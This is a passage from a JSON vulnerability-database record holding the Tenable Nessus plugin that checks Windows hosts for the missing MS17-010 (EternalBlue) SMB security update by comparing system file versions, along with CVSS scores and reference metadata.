script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-19T00:54:29", "differentElements": ["vpr"], "edition": 13}], "viewCount": 2990, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-22T13:01:22", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-22T13:01:22", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "MS17-010.NASL", "hash": "59a3f59c439bc2d52437908b8868f320", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, 